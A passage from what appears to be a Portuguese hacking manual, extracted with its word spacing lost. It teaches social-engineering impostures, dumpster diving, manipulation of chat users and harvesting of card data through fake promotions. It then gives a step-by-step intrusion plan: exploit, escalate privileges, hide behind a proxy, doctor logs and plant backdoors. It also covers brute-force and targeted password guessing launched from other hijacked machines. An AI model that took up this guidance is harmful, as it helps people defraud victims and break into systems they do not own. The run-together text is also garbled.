dosdesuabusca,compreendendocombinaçõesecruzamentodeinformações,é
importantíssima."Lernasentrelinhas"nuncafoitãonecessário...
Mesmoassim,apesquisaésóocomeço.Depoisdedescobrirquemguardaas
informaçõesequaissãoelas,ohackerdevepensarnosmeiosqueutilizarápara
extrairmaisdados.Énessepontoqueentraaimpostura:ohackerdevesefazer
passarporoutraspessoas(sejadaprópriaempresa,sejaclientes,fornecedores,
sejaatéagentesdogoverno)para,depossedasinformaçõesjá"garimpadas",anga-
riardadosedocumentosmaissérios,específicose,principalmente,valiosos.
Aseguirvamosfalarsobremétodosutilizadosparaaaquisiçãodedados
vitaisdasempresas,tantoemataquesdiretosquantoindiretos.
Disfarces
Comoumbomespião,oengenheirosocialdevedispordediversosdisfarces
paraalcançarseusobjetivos.Entreelesdevemconstardesdesepassarpor
faxineiroatéconsultoremvisita.Certasempresasadoramreceberconsultores
deempresasfamosas.Paratanto,bastaapenasqueohackertenhaumterno,
boalábiaeumcrachá.Ofatoridadenãoémaisumproblematãogrande,poiso
perfIldoprofIssionaldeinformáticaécadavezmaisjovem,bastaapenastratar
umpoucodaaparênciaedalinguagemaserutilizada.
Aincorporaçãodopersonageméumfatordegrandeimportânciaparaosu-
cesso.Imagineumhackerdisfarçadodefaxineiro.Elesimplesmentenãovai
andaratéalatadelixo,separarospapéisdeseuinteresseevirarascostas,será
atéestranhoseninguémsuspeitar.Eledevefazertodooserviçodesdelimpara
mesaatévarrerochão,conseguindomaisoportunidadesparaentenderoque
aconteceaoseuredor.Depoisdeumcertotempo,aspessoaspassamaconfIar
maiseoinvasorpodetranqüilamentelimparasmesasrepletasdematerialim-
portanteparaodesenvolvimentodeumataquebem-sucedido.
oLixoérico!
olixodeumescritórioé,potencialmente,umadasmaioresfontesdeinforma-
çõesparaohacker.Geralmenteénelequeaspessoasjogamaquelespedaçosde
papéisemqueanotamsuassenhasantesdememorizá-Iasoutranscreverpara
umaagenda.Alémdisso,olixodeumagrandeempresarecebedezenasderelató-
riosquepodemparecerbanaismasque,naverdade,guardaminformaçõessobre
opatrimôniodaempresa,funcionárioscadastradoseaspectosdossistemas.
Afaltadepreocupaçãosócomessefatorisoladopoderenderumainvasão
bem-sucedidaeaindaajudaroinvasoralimparseusrastros.Muitasvezes,ele
mesmopodeestarlápararecolherolixodasaladoadministrador.Obviamen-
te,issodependemuitodaperíciadohackeredoquantoelerealmenteprecisa
dasinformações,casocontrário,elepodeesperaratéqueomaterialsejaposto
paracoleta,oquenãoseriamuitorecomendado.
1126I
EngenhariaSocialI

Universidade1°Ano
Funcionáriosdescontenteseredesdecontatos
Talvezsejaafonnamaisfácildeconseguirinfonnaçõesdentrodeumaempresa.Mui-
tasvezesPOderustarumcertovalor(nemsempreemdinheiro...),masissovaidePender
doteordeinsatisfaçãodofundonárioparacomaempresaemquestão.Exploraraftagi-
lidadedepessoasinsatisfeitascomascondiçõesdetrabalhoémuitomaissimplesdoque
POdemosimaginar.Émuitofácilparaoadministradorinsatisfeitocomosaláriofalaralgo
quepossaprejudicarseussuperioresdealgumafonna.Nemsempreelessãoúteisapós
saíremouseremdemitidos,poisapolíticadasempresaséadetrocarassenhas.
Nãosedeveesquecerqueosfuncionáriosdeumaempresapossuemuma
rededecontatos,dentroeforadela.Issotambéméválidoparaosdescon-
tentes,quepodemforneceraohackerinformaçõesvaliosassobreoutraspes-
soasesobrecaminhosparachegaramaisdados.
oapelosentimental
oinvasorpodeincorporaroutrapessoa,commuitomaisfacilidade,nomundovirtu-
al.VamossuporqueohackerquerinvadirumcomputadorqualquernaInternet.Ele
procuraumasaladechateobservasilendosamenteaconversaporumtempo.Depois,
saidasalaeentranovamentecomalgumapelidodosexoopostoaodavítimaescolhi-
da.Apartirdessepontoéfácilconquistaraconfiançadointernautaeganharacesso
aosseusdadospessoaismaisimportantes,usandoapenasastécnicasdeseduçãoe
conquistaquetodosnósconhecemoseque,mesmoassim,fundonam.Observeque
homensemulherespossuemmaneirasdiferentesdeseremconquistadoseseduzidos.
Programaçãoneurolingüística
Aosecomunicarcomqualquerpessoa,épossívelutilizartécnicasdeprogramação
neurolingüísticaparaconfundirapessoaefazê-laconcordarcomvocê.Consegue-se
issodediversasformas,sendoamaisóbvia(equefuncionaemquase100%doscasos)
fazercomqueavítimaacreditequenarealidadeaidéiafoidela.Umadastécnicaspara
confundiravítimaéachamadaacompanha-acompanha-acompanha-comanda: o
hackerimitaojeitodeescrever,defalareatéagesticulaçãodeseuinterlocutor.Fazisso
porumbomtempoduranteaconversa,atéqueumelodeintimidade seformeea
vítimapensequeestánocomando,baixandoaguarda.Apartirdaí,ohackerpode
comandaraconversasemqueavítimapercebaesugardelatudooquefornecessário.
AutilizaçãodaInternet
Umaformaeficazdeconseguirasinformaçõesdesejadaséatravésdeformulá-
riosecadastrosnaInternet.Sitesqueoferecembrindesparaquem secadastrar
epromoçõesqueprometemosmaisvariadostiposdeprêmiospodemnãopas-
sardeinstrumentosutilizadospeloshackersparaconseguirumavastaquantida-
dedeinformaçõessobreosinternautas.Entreelas,estãodadospessoais edicas
sobreocomportamentodafuturavítima.Essatécnicaéutilizadaprincipalmen-
teparaaobtençãodenúmerosdecartõesdecrédito edadoscomoCPFeRG.
11271
]EngenhariaSocial

IUniversidadeH4CK3R I
ofatorsorte
Hámuitoscasosemqueosprocedimentosdeengenhariasocialsãofacilita-
dospordescuidosdosusuáriosedosadministradoresdoparquedeinformática
dasempresas.Àsvezes,mesmoempresasmuitosegurasdeixamescaparuma,e
apenasuma,informaçãonãoóbvia.Seohackertiverasortedetropeçarnessa
informação,seuprocessodeengenhariasocialpoderáserabreviadoemvários
dias,àsvezessemanas.Oreilleattentiveetbonvouloir!2
Navegandopelomarproibido
Mesmodepoisdeinvadidos,umcomputador,umsiteouumaempresasãoum
quebra-cabeçacomplicadoparaoinvasor.Atéentãoestepossuíaasinforma-
çõessobreaperiferia.Agoraeletemacessoirrestritoatodasasáreasdolocal
invadido,masqueparaeleseparecemaiscomumlabirinto.Ocontrolede
acessoeusuáriosinternosdeempresas,porexemplo,normalmenteémenos
rigorosoqueosprocedimentosdesegurançadaspartesvisíveisexternamente
(site,e-mail,gatewayseInternet).Masaindaassim,umavezdentro,oinvasor
deveráquebrarsenhas,contornardispositivosdesegurançaoumesmoutilizar
novamenteaengenhariasocialparaobterinformaçõescadavezmaispróxi-
masdonúcleo.Esteéumprocessosemftm';-)
Casosreais
Oshackerslistadosnesta"galeriadafama"ganharamnotoriedadeporseus
ataquesmuitobemengendradosepelassomasfabulosasemdinheiroqueforam
capazesdemovimentar.Maslembre-se:hackers,quandosãorealmentebons,não
sãoapanhados...
AbrahamAbdallah
Em2002,ohackere.lavadordepratosAbrahamAbdallahrecebeuacusações
defraudesdaordemdeUS$80milhões.Utilizando-sedarevistaForbes,que
publicouumalistacomas400pessoasmaisricasdosEUA,eleroubouonúmero
dediversoscartõesdecréditodepessoasfamosas.Utilizandotécnicasdeenge-
nhariasocial,Abdallahenganoubancoseempresasdecréditoparaconseguiras
informaçõesparaoseugolpe.
Chegouamontarumarededecaixaspostaisparareceberasencomendas
quefaziacomodinheiroroubado.Foidescobertopelapolíciaaotentarretirar
umaquantiaacimadosaldoexistentedeThomasSiebel,fundadordaempresa
dee-commercechamadaSiebelSystems.
2"Orelhaatentaeboavontade""-expressãomuitoempregadanotextoAsMileUmaNoites -
NarrativasdeSabedoria(LesMilleetUneNuits-RécitsSapientiaux.TraduçãoparaofrancêsdeRené
R.Khawam,ÉditionsAlbinMichel,França).Ooriginalemárabeéimpronunciávelparaosocidentais.
1128I
EngenhariaSocial[

Universidade1°Ano
KevinMitnick
KevinMitnickjáfoiumdoscriminososmaisprocuradospeloFEI,devidoaos
crimesdigitaisquecometeu.Apósganharaliberdade,ajudouafundaruma
empresadeconsultoriaespecializadaemsegurança,aDefensiveThinking.Esse
éumfatoquechegaasurpreendermuito,poisMitnicktomou-seumsímbolo
daengenhariasocialaoplanejarerealizarseusataquesaossistemasdegran-
desempresaspelomundo.
Eleusouasartimanhasdaengenhariasocialpelaprimeiraveznosanos70,ao
conhecerumestudantequelidavacom"phreaking"(ohackeamentodelinhas
telefônicas).Elepercebeucomoosphreakersagiam,fazendo-sepassarporÍllll-
cionáriosdascompanhiastelefônicas.Começouatentarcomamigoseprofes-
soresesentiu-semotivadoapósnotarquetinhafacilidadeemconseguirinfor-
maçõesconfidenciais.Elefoievoluindosuastáticasatéopontoemquenenhu-
maempresaestavamaisseguracontraosseusataques.
Sualistadeataquesincluidesdetelefonemasinocentesaosetordesuporte
atéaincorporaçãodefuncionáriosimportantesparaconseguirinformações
comosenhasparaobteracessoagrandessistemasdaempresa.Dessaforma,
Mitnicktornou-seumalendaparaapopulaçãohackeraoredordomundo.
Alémdesses,podemoscitar,comlouvor,outroshackersqueseutilizaramde
engenhariasocialparaatingirseusobjetivos:
~OpolonêsVIadimirLevin,quedesvioumaisdedezmilhõesdedólaresde
contasnoCityBank;
~RaphaelGray,queroubouquase30milcartõesdecréditonosEstadosUni-
dose,comumdeles(queelealegaserdeBillGates),comprouumacaixade
Viagraearemeteuaopróprio;
~JeromeHeckenkamp,inglêsde22anos,quepediuaojuizparaserpreso
depoisdeinvadirsitescomooeBay,LycoseeTrade;
Poderíamospreenchercompletamenteestelivrocitandodiversoshackers
famosos(inclusivebrasileiros).Apenasestesexemplos,entretanto,mostram
comoasestruturasdesegurança,quejásãoruinsnocampotecnológico,ficam
pioresquandoofatorhumanoentraemcampo.
1129I
]EngenhariaSocial

Vulnerabilidades
Capítulo
"!amaworld'sforgottenboy
Theonewhosearchesanddestroys
Lookouthoney,'cause/'musingtechnology
Ain'tgottimetomakenoapology"i
TheStooges,"SearchandDestroy"
J"Eusouumg'arotoesquecidopelomundo/Aqueleque
vasculhaedestroi/EstouusandotecnoJog'ia/Eporissonão
tenhotempoparamedesculpar':DoalbumIlawPower.1973.

IUniversidadeH4CK3R I
ImagineumanaçãocomoosEstadosUnidosdaAmérica.Forte,rica,militar-
menteimbatível,tecnologicamentemuitoàfrentedequalqueroutra.Émuito
difícilimaginarqueumanaçãocomoessapercaumaguerrasendotravadaem
algumpaísdistante.Mesmoque,poralgummotivo,percatalguerra,osdisposi-
tivosnacionaisdedefesanuncadeixariamqueumataquequalquer(militarou
terrorista)chegassepertodasfronteirasdopaís.Certo?
Bem,11desetembrodeixouclaroqueninguémpodeprevertudo.Osterroris-
tasatacaramporondefoimaisfácil,usandopessoascomuns-cidadãosameri-
canos-eatuandoempontosreconhecidamentevuneráveis-afracasegurança
dosaeroportos.Quempoderiaimaginarqueaviõescomerciaisseriamusados
comomísseisparaderrubarastorresdoWorldTradeCenteremNovaYork?Se
pensarmosbem,aidéiaétãoinsanaquechegaasergenial(dopontodevista
dosterroristas,obviamente):foideverasfácilcausartodoaqueledano.
Administradoresdesitesederedesemesmonós,usuárioscomunsde
informática,temosomesmodilema.Aplicamoscorreçõesdesegurançalibera-
dospelosdesenvolvedoresdosprogramasqueusamos,instalamosflrewalls,anti-
vírus,removedoresdetrojansetodaumaparafernalhatecnológicaparadesco-
brir,depoisdealgunsdias,quenãoadiantounada:bastouumgarotode12anos
commuitavontadeemásintençõesparainvadirnossossistemasefazerum
beloestrago.
Infelizmentemesmoousuárioleigodevesepreocuparcomasegurançade
suasinformaçõesesistemasdeinformática.Hojenãobastatrocarafechadura
daporta:seoseuforrofordemadeira,osladrõesentrampeloteto.Assimcomo
devemosmodillcar(desflgurar?)nossascasasparatorná-Iasmaisseguras,te-
mosdeestaratentosatodososburacosnãoóbviosqueosprogramasosquais
usamosapresentamparaosterríveischapéuspretos2.
Nocõessobrevulnerabilidades
I
oestudodasvulnerabilidadesexistentesdevefazerpartedarotinadobomhacker
(err...domautambém...).Diariamente,listasdediscussãoesitesespecializados
liberamlistasemaislistasdefalhasemsistemasoperacionaiseservidores.Consi-
derandoque,sevocêestálendoestelivroeestánestecapítulo,vocêestáquerendo
aprender.Utilizar-sedetécnicasjáconhecidasedivulgadaséotrampolimpara,no
futuro,descobriressasvulnerabilidadesantesdosorganismosdedefesa.Mesmoum
hackerexperientetemdeestaratentoaessaslistas,casoalgumusuárioqueira
facilitarseutrabalhoedeixarseucomputadordesatualizado.
2Nocapítulo1,PsicologiaHacker,vimosdiversostiposdehackersdivididosporhabilidade.Masogrande
universodosubmundodigitalpodeserdividido,semlevaremcontaashabilidadesindividuais,entreacomunidade
dobemealegiãodomal.Osdoprimeirotiposãochamadosdechapéusbrancos,ouwhitehats.Jáosmalidosos
seautodenominam chapéuspretos,oublackhats.Háosquetrabalhamnolimiardosdoistiposesão
chamadosdegreyhats(chapéuscinzas).Emtempo:aRedHat,Ine.(www.redhat.com)nãotemnadacomisso...
1132I
VulnerabilidadesI[

Universidade1°ano
Normalmente,hátrêstiposdefafuasquepodemserexploradas:
1.Fafuasqueafetamadisponibilidadedamáquina("tirá-Iadoar").Issopode
serfeitodediversasmaneiras,umadelas(masnãoaúnica)éanegaçãode
serviço(ouDoS).
2.Falhasquepermitemoacessolimitadoaosistema.Éoquecomumente
chamamosde"invasão".Nelaincluem-sefafuasdosoftwareefalhasdeconfigu-
ração(ouseja,humanas).Asfalhasdesoftwaremaiscomunspodemserexplo-
radasdiretamenteouporalgumtipodeestourodepilha(ofamigeradobuffer
overflow).Jáafalhahumanamaiscomuméinstalarosistemaenãoaplicaras
atualizaçõesepatchesrecomendadospelofabricante.Tambémécomumdei-
xarascontas-padrãodosistema(administrador,root,bin,operator,sysop...a
listaégrande)ativasoucomassenhasdefault.
3.Falhasquepermitemaexecuçãodecódigoarbitrárionamáquina.Podeser
opassoseguintedotipoanterior,oupodeserexploradodiretamenteporalgum
tipodeexploit,sendoobufferoverflowmuitocomum.
Háoutrostiposdefafuas,masnofundosãoespecializaçõesdessestrêsgran-
desgrupos.Seoseuobjetivoéserumusuárioouadministradorbeminformado,
estaratentoàslistasdesegurançaéumbompontodepartida,umavezquea
maioriaesmagadoradosautodenominadoshackers/crackersnãopassamde
molequescomvontadedepicharalgumacoisa.Taisfedelhosnormalmentenão
conhecemnadamuitoalémdodivulgadonessaslistas.ÉsuaobrigaçãoSEMPRE
atenderaosapelosdoseufabricantedesoftwareeatualizarosprogramasque
vocêusaparaficarimuneaessasfafuas.Senãoofizer,oazaréseu:vaificarà
mercêdeadolescentescommuuuitotempolivre...
SuperlammersesuavisãodeRaio-X
Qualquerfalhadesegurançapossuicaracterísticasúnicas.Cadasistema
operacionalecadaprogramaautônomoapresentaassuas,masgrandepartedas
vulnerabilidadespermiteoacessoaáreasconsideradasrestritasdeservidores
ecomputadorespessoais-trocandoemmiúdos,todaestruturadediretóriosde
todososdiscosrígidos.
Ograndeproblemadoslammerséqueelesnãotêmamínimaidéiadoqueestão
fazendo.Enemqueremter:bastaencontraralgumsitedesprotegido,desfigurá-Ioe
gozardosseuscincominutosdefama.Comseusconhecimentoslimitados,normal-
menteusamumaabordagemdetrêsestágiosparadirecionarseusataques:
1.Buscaporcomputadoresvulneráveis
Lammersnormalmentenãopossuemumobjetivodefinido.Nãoestãoatrásde
prejudicaraquelacompanhiaouroubarodinheirodaquelebanco.Pelocontrá-
rio,vasculhamaInternetatrásdecomputadores(sejaservidores,sejapessoais)
queestejamvulneráveisaospoucostiposdeataquequeelesconhecem.Para
tanto,utilizam-sedeferramentasconhecidascomoscanners,que,apósforne-
1133I
]VulnerabilidadesI

IUniversidadeH4CK3R I
cerumconjuntodemáquinasasertestado,retomamlistasàsqueestiverem
desprotegidas.ComoépossívelcolocarfaixasinteirasdeendereçosdeInternet
neles,essaslistaspodemchegaracentenasdecomputadoresesistemas.
2.Invasãoeposse
Masdescobrirasvulnerabilidadesnãoéosuficienteparaexecutarumataque.
Umavezencontradooalvofácil,osscript-kiddies(outronomedadoaoslammers)
utilizam-sedeoutrasferramentasparaexplorarosburacosencontrados.Nor-
malmente,nossosgarotostêmemmãosumabibliotecarazoáveldeexploits
-
scriptseprogramasutilizadospara"desfrutar"dasfraquezasdavítima -para
quesuadescobertanãosejaemvão.Háexploitspara"derrubar"amáquina-alvo
eparacontrolá-Ia.Aplicadooexploitapropriado,olammer"owna"3osistemae
fazoquequercomele.
3.Manutençãodoataque
Olammersabequesuaglóriadurarápoucoe,portanto,instalanocomputa-
dorinvadidoprogramasquelhepermitamvoltarlá,mesmoqueoburacopor
ondeentrousejaobstruído.Chamadosdebackdoors-literalmente,portade
trás-,sãorotinasextremamentesimpleseeficientesque,utilizandoosrecur-
sosdoprópriosistemaoperacional,permitemaoinvasorconectar-seposteri-
ormenteaosistema.Écomuminstalarmaisdeumbackdoor,ekiddiesmais
sofisticadoschegamaocúmulodeinstalarentreelesalgumfacilmente
detectável.Issoconfundeoadministradordamáquina,fazendo-oacreditarque
resolveuoproblemaremovendoapenasaquele.
Notequeestelivrotemaintençãodeapresentaraportadeentradadesse
submundoaoleitor.Nenhumlivro,publicação,siteouFAQnaInternetensinará
ninguémaserhacker,poisissodependedeanosdeestudo,evoluçãocontínuae
abnegação.Nestecapítulo,vamosestudaralgumasferramentasefalhasdesegu-
rançamaiscomunsemmicrosdomésticosecomoexplorá-Iasdaformamais
eficaz.Obviamente,aquiaindaestaremosnoterrenodoslammers.Masmesmo
sendoprocedimentostecnicamentesimples,veremosquenãosãonadainócuos.
Osquatropassosparaumhackingfeliz
VocêjáfeztodaapartedeEngenhariaSocial(queseriaopassozerodesta
lista)navítima.Ouencontrouumavítimaporacasoemsuaslongasnoitesde
buscaaesmopelaInternet.Jádescobriuondeestãoasbrechasequeferramen-
tasusar.Sólherestainvadi-Ia,masaperguntaé:como?Seráfácil?Seráquenão
éumaarmadilha?Seráqueomeuscannermeenganou?
Arespostaparatudoissoéplanejamento.Ospassosaseguirforamcompi-
ladosdediversosrelatosdehackers/crackers.Nãotêmaintençãodeseruma
cartilha,maspodemservirdebaseparaamçmtagemdeataquesbem-sucedi-
3Tomarpossedamáquinainvadida,desfigurando-aourecuperandodadossecretos,nojargãoaceito
peloskiddies.
11341
VulnerabilidadesIr

Universidade1°ano
dos.Sãodestinadosaataquesaredesdeempresas,masépossíveladaptá-Iospara
atacarcomputadorespessoaissolitários,também.
1.Umavezdescobertaavulnerabilidade,nãotenteinvadirsuapresaimedia-
tamente.Aocontrário,conheçasuavítima.VisiteseusitenaInternet(semata-
car,apenasolhe).Sefornasuacidade,visitesuasedeetentedescobrirmais
sobreprodutos,empregos,serviços,funcionários,hábitos...Podem-seusartéc-
nicaspassivas(observaçãoparaveroqueentraeoquesaidamáquinaou
rede)ouativas,comoorganizarminiataquesapontosisoladoseverificaras
mensagensquesãoretornadas.Oimportanteécoletarinformaçõessuficientes
paraelaborarumplanodeação,preferencialmentecomdesfechosalternati-
vos,casoalgodêerrado.
2.Oprimeiroacessoagentenuncaesquece.Essaéapartemaisimportantedo
ataque.Pode-sedizerqueestaetapaéoataquepropriamentedito.Depoisdedes-.
cobertaavulnerabilidadeeexaminadoocomportamentodavítima,useoexploit
apropriadoparaganharacessolimitadoaosistema.Enãoseesqueçadeusarum
proxypúblicoparaesconderseuendereçoIP!!!
3.Humm.Umavezcomacessolimitado,apróximaetapaconsisteemganhar
acessototalàmáquina(rootparasistemasUnix,administradorparasistemasWinNT
-noWin9x,oprimeiroacessojágarantecontroletotaL).CadaSOpossuiprocedi-
mentosdiferentesparatal.Umavezconseguidooacessoirrestrito,bastacoletaras
informaçõesdesejadase,seforocaso,desfigurarosistema.
4.Agoraquevocêjá"ownou"osistema,tratedecobrirseusrastroseinstalaras
portasdetrás.Verifiqueoslogsdosistemaeapaguetudooqueforrelativoàsua
visita,MASAPENASISSO!Resistaàtentaçãodeapagarologtodo
-um"buraco"no
registrodeeventosfarácomqueoadministradordescubramaiscedodoqueo
esperadoquealguémandoubulindocomseubrinquedo.Depoisdefazeracirurgia
noslogs,instaleosbackdoors.Algunshackersmaisexperientestêmocuidadode
aplicarpatchesnosistemapararemoverasportasqueosdeixaramentrar,evitan-
doassimqueoutroshackersmenoshabilidososentremnosistemae,pordescuido,
alertemoadministradordequeamáquinafoitomada.
Algunsdospassosdevemserrepetidos,especialmenteo2.Emalgunscasos
seráprecisofazerdiversosminiataques"1234","1234",atéquetodasas
brechastenhamsidoencontradaseexploradas.Obviamenteestamosfalando
desitesecomputadoresfrouxamentemonitorados:tenhasempreemmente
quemuitossistemaspossuemIDS(IntrusionDetectionSystems),quedetectam
scanseauditamoslogsdosistema(oquevocêapagaéguardadoemoutrolog
escondido...),aumentandoassimapossibilidadedevocêserpego.Háaindaos
sistemaschamadosdeHoneypots,queapresentamaoinvasorumaaparência
desistemavulnerável,mas,narealidade,oconduzemparaumaarmadilha.Nin-
guémquerirparaacadeiae,mesmoquenãohajaimplicaçõespenaisdesse
tipo,serpegosempreé,nomínimo,desagradáveledesabonador.Algunscuida-
dosdevemser,portanto,seguidosparaqueoinvasorpossadesfrutardesua
presasemserimportunado.
1135I
]VulnerabilidadesI

IUniversidadeH4CK3R I
Searchanddestroy
Agoraquevocêpossuiumaidéiageralsobrecomoorganizarumataque
(lembre-se:PLANEJEANTES!!!),podemosapresentá-Ioaalgumasferramentas
queoajudarãoemseusataques.Masnotebem:avelocidadecomaqualas
armassãocriadaseneutralizadaséviolenta!Nãoseatenhaaquiaoprograma
emsi,massimaomododeusarumaferramentadessasparaconduzirum
ataque.Équasecertoquetaisferramentasnãoserãoeficazes,poisoscompu-
tadoresjáestarãoprotegidoscontraelas.Mastambémécertoquenovos
softwaressurgirão.Fiqueligado!
Loginsfracos
Nãohánecessidadedeferramentaalguma,sequeminstalouosoftwarejáfezo
serviçoparavocê.Todosossistemaspossuemalgumascontas-padrãojáconfigura-
dasantesdeosistemaserinstalado(ouseja,jánamídiadeinstalação).Éobrigação
dequemestápreparandoumamáquinaparautilizaçãorealsaberquaissãoessas
contasemudarassenhasdasqueserãousadas,desabilitandoasrestantes.
Tristemente,vemosdiversos"administradores"poraíquerecebemseus
Windows2000eseusUnixdiretamentedofornecedorenãosepreocupamem
fazerumaanálisedesegurançaantesdecolocaroequipamentoemprodução.
Paraquemquerbrincardehacker,sistemasassimsãoumpratocheio.Mesmo
queassenhassejamalteradas,saberquetaiscontasexistempodeserum
facilitadorparaoscriptkiddie,umavezquemetadedaduplajáéconhecida,
faltandoapenasadivinharasenha.
NoCD,reunimosdiversosconjuntoslogin/senhacomuns,válidosparaamai-
oriadossistemasoperacionais.Estãoemformatotextoepodemserutilizados
comolistasdepalavrasemquebradoresdesenhas.Loginscujassenhasnãosão
mostradasnalistasãocontasqueexistemmasparaasquaisnãoháuma
senha-padrãoconsagrada.Experimenteessascombinaçõesemsistemasconhe-
cidosseus.Hásistemasnosquaisvocê,porengenhariasocial,jáconhecealgu-
mascontas,faltatentaralgumasenha.Namaioriadoscasos,umadaspalavras
dalistaacimaéusadacomosenhaporalguém.
Arrombandoaportadafrente
Nosvelhosebonstempos,aspessoasnãoeramtãoligadasemsegurança,efuros
comoosdascontasesenhas-padrãoeramfreqüentes.Mashojetodossãoparanói-
cos.Hámuitomaischancesdevocêdeparàr-secomumsistemaemquetodasas
contas-padrãoforamcanceladaseparaoqualengenharia.socialnãoépossível.
Nessescasos,ohackernãotemoutraalternativasenãotentar,umaporuma,
todasascombinaçõesdeloginesenhaqueelepuderimaginar.Pornãodeman-
darinteligência,mastrabalhobraçal,talprocedimentoéchamadodeforçabruta
oubruteforce.Fazê-Iamanualmenteéimpossível,dadasasproporçõesdatarefa,
entãooscrackersnormalmenteusamprogramasqueautomatizamoprocesso.
1136I
VulnerabilidadesI[

Universidade1°ano
obroteforceéseguramenteométodomaisdeselegantedetentarumainva-
sãoporloginesenha.Vocêpodefazerbroteforcenocomputadordoseuir-
mão,emcasa,paradescobrirassenhasdosarquivosExcelouPDF,porexem-
plo.Oupodetentar,viaInternet,entrarnaquelesitedesexocomumadupla
usuário/senhaexistente,emvezdebuscarquebrarasegurançadositepor
outrasvias.Tambémpodeexperimentarentrarnaárearestritadarededesua
empresa.Dequalquerforma,obroteforceédeselegante,facilmentedetectável
e,emsistemasbemconfigurados,inócuo.
Noexemplodosite,umsistemadecontroledeacessobem-feitocancelariao
usuáriooutravariaologinporumtempodeterminado,casomaisdetrêstenta-
tivassemsucessofossemfeitas.Emsituaçõesdewar-dialing,énecessáriodiscar
paraomodemnoqualsequerpenetrarparacadatentativadebroteforce,o
queotomadispendiosoemtermosdedinheiroetempo.Entretanto,hácasos
(normalmenteosmaisdifíceis)emqueobroteforceéaúnicasaída.
Háumoutrométodoparecido,quepodeserconsideradoumbruteforceinte-
ligente:osataquespordicionários.Utilizam-selistasdepalavrascomuns:no-
mespróprios,marcasconhecidas,gírias,nomesdecanções,f1lmes...Ossoftwares
modernosdeforçabrotaempregamambososprocessos,tentandoprimeiroa
listadepalavrasparadepoisaplicarascombinaçõesseqüenciaisdobrotefor-
ce"primitivo".
Obviamente,obroteforceéumprocedimentoperigoso.Umadministrador
desistemasseguramenteperceberáqueoslogsdefalhasdelogincrescem
assustadoramente,equetodasastentativasvêmdeumúnicoIP.Umpaleativoé
colocarumaesperadealgunsminutosentreumatentativaeoutra,masissovai
retardaraindamaisumprocessoque,normalmente,podedurarváriosdiasou
mesmosemanas.Oprocedimentomaissensatoéinvadirváriossistemassem
importânciaedispararobroteforceapartirdeles(obviamente,semprese
lembrandodeapagarseusrastros).
Hackersmaisexperientessabemqueaslistasdepalavrasdevemser
customizadasparacadaalvo,eque,paraserconsideradaboa,umalistadeve
conterelementosconseguidosporengenhariasocial,comoonomecompleto
dousuário,desuanamorada,esposaoufIlhos,seuspassatempos,omodelode
seucarronovoouseuendereço.Informaçõescomoestassãoutilíssimas,efeti-
vasemmaisde50%dosataques
-principalmentequandosetemumnúmero
razoáveldecontasválidas,bastandodescobrirapenasasenha.Seocandidatoa
invasornãosouberpelomenosologindeumacontaválida,équasecertoque
suastentativasserãoinfrotíferas.
Sualistadepalavrasdeveconternomesprópriosdopaísondeamáquina-alvo
seencontra.LivroscomoQuenomedareiaomeufIlho?ajudammuitonessa
hora,econseguirediçõesdesseslivrosemdiversaslínguaséumrefInamento
importantedatécnica.Procurarnalistatelefônicaouemsuaagendacomercial
pornomeseanotaçõesdeoutraspessoa~tambéméumaboaidéia.
1137I
IVulnerabilidadesI

IUniversidadeH4CK3RI
Sempretendoemmentequesaberologincorretodavítimaémaisquemeio
caminhoandado,aquivãoassugestõesparaaplicarcomosenhanesselogin:
1.Sempretentetodososnomesesobrenomesdavítima,umporvez.Seo
loginéoprimeironome,ouumacombinaçãodenomes,hámuitaschancesde
queasenhasejaalgumdosoutrosnomes,seguidosounãodenúmeros
seqüenciaisouletras._A,_B,_Cou-XYZtambémsãoSufIXOScomuns(emmai-
úsculasouminúsculas).
2.Sedisponíveis,tenteaspalavrasconseguidasporengenhariasocial:namorada/
esposa,filhos,carro,passatempo,posiçõessexuais,nomesdoschefes...Emseguida,
tenteosnomesprópriosmaiscomunscopiadosdaagendaoudalistatelefônica.
3.Tambéméumaboaidéiatentaralgorelativoaosistemaqueestásendo
invadido.SeamáquinaemquestãoéaúnicaquepossuiAutoCADemtodaa
empresa,tenteassenhasacad,autodesk,autocadoucadcad.Seestiveremum
terminaldemainframesIBM,tenteibmibm,X3270,bigblue,X25.EmumVAX,
experimentevax,vms,digitaloucompaq.
4.Usuáriostambémsãosensíveisaolocalondetrabalham.Experimentealgu-
macoisarelativaàcidade,bairroouruaondeaempresaseencontra,opróprio
nomedaempresaouseusprodutosmaisfamosos.EmumamáquinadaTelemar,
porexemplo,poderiamsertentadasassenhasDDDeh31,veloxouinterurbano.
Àsvezes,ofuncionárioestádesgostosocomacompanhia.Suasenhanesses
casoscostumaserouumapalavradebaixocalãooualgumprodutodaconcor-
rência(exemplo:umfuncionáriodaConectivapossuiasenhawindowsxp).
5.Porúltimo,deve-se,separadamente,tentarsuaslistasdepalavrasesenhas
comuns.Nuncauselistascommaisdecempalavras,poisvocêficariaexposto
demaisefacilmentedetectável,alémdemodularizareespecializaroataque.
Umprocedimentoimportanteaoelaborarsuaslistasdepalavrasétentarpen-
sardamesmamaneiraqueousuário.Casoelefujadascombinaçõescomuns
(nomedaesposa,ftlhos,etc.),suasenhaseráoqueprimeirolhevieràcabeça,
ouonomedealgumobjetoqueestáemsuaescrivaninha.
NoCDhádiversosprogramasparabruteforce,amaioriacompossibilidade
deseusaremtantodicionáriosquantocombinaçõesseqüenciais.Nãovamos
recomendarnenhumaqui:teste-osetiresuasprópriasconclusões.
Semquebraroovonãosefazomelete
Imagineasituaçãoinversaàdaseçãoanterior.Vocêjáentrounumamáquina
UnixouWindowsNT/2k/XP ecapturouoarquivodesenhasdosistema.Obvia-
menteessassenhasestãocriptografadas,portanto,oarquivopoucolheseráútil
senãofosseumaoutraclassedeprogramasquetodocrackerdeveter:os
quebradoresdesenhas.
Namaioriadasvezes,invade-seosistemaporalgumdescuidodoadministra-
dor,mascomumusuáriocujospoderessãomuitolimitados.Roubando-seoar-
quivodesenhas,épossívelentrarnasáreasprivativasdosoutrosusuários(den-
138 I
VulnerabilidadesIr

Universidade1°ano
trodamesmamáquinaounarede)ecapturarinformaçõesúteisparaumataque
maisprofundo,oumesmodadosvitais,comosenhasparaoutrosserviços,acesso
aáreasrestritasdaempresaounúmerosdecartãodecrédito.Épossíveltambém
conseguirasenhadoadministradorereahnente"ownar"amáquina.
Arquivosdesenhascriptografadasgeralmentepossuemhashesaoladodos
logins.Hashessãoumaseqüênciadesímbolosque,confrontadoscomachave
criptográficacorreta,revelaasenhadousuário.NoWindowsNT(e,posterior-
mente,noWindows2000enoXP)assenhassãoarmazenadasnoregistro.Um
exemplodehashdoWindowspoderiaser:
